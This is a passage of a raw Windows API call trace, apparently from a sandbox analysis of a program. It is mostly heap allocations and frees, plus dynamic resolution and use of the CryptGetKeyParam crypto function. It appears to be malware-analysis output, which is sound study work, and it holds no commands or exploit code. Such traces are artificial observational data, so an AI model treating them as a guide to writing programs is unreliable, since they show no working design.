[0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0128.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0128.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0128.647] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0128.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0128.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0128.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0128.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0128.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0128.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0128.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0128.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0128.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0128.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0128.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0128.647] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0128.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0128.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0128.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0128.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2560 [0128.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0128.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0128.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0128.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0128.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca910 [0128.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0128.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0128.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0128.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0128.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0128.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0128.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0128.648] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0128.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0128.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0128.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0128.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0128.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0128.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0128.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0128.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0128.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0128.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0128.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0128.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0128.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0128.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0128.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0128.648] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0128.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0128.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0128.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0128.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0128.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0128.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0128.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0128.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0128.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0128.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0128.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0128.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0128.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0128.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0128.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0128.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0128.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0128.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0128.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0128.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0128.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0128.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0128.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0128.649] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0128.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0128.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0128.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0128.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0128.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0128.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0128.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0128.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0128.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0128.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0128.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0128.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0128.649] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923b0 | out: hHeap=0x1780000) returned 1 [0128.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0128.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8e0 [0128.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0128.649] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0128.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0128.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0128.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0128.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0128.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0128.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0128.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0128.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0128.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0128.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0128.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0128.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0128.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0128.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0128.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0128.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0128.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0128.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0128.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0128.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0128.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0128.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0128.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0128.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0128.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0128.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0128.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0128.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0128.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0128.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0128.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0128.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0128.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0128.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0128.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0128.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0128.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0128.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0128.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0128.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0128.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0128.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0128.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0128.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0128.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0128.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0128.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0128.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0128.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0128.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0128.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0128.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0128.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0128.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0128.652] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0128.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0128.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0128.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0128.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0128.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0128.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0128.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0128.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0128.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0128.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0128.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0128.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0128.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0128.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0128.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0128.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0128.653] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0128.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0128.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0128.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0128.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0128.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0128.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0128.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0128.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0128.653] CryptGetKeyParam (in: hKey=0x41ac280, dwParam=0x7, pbData=0x43e2890, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2890*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0128.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0128.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 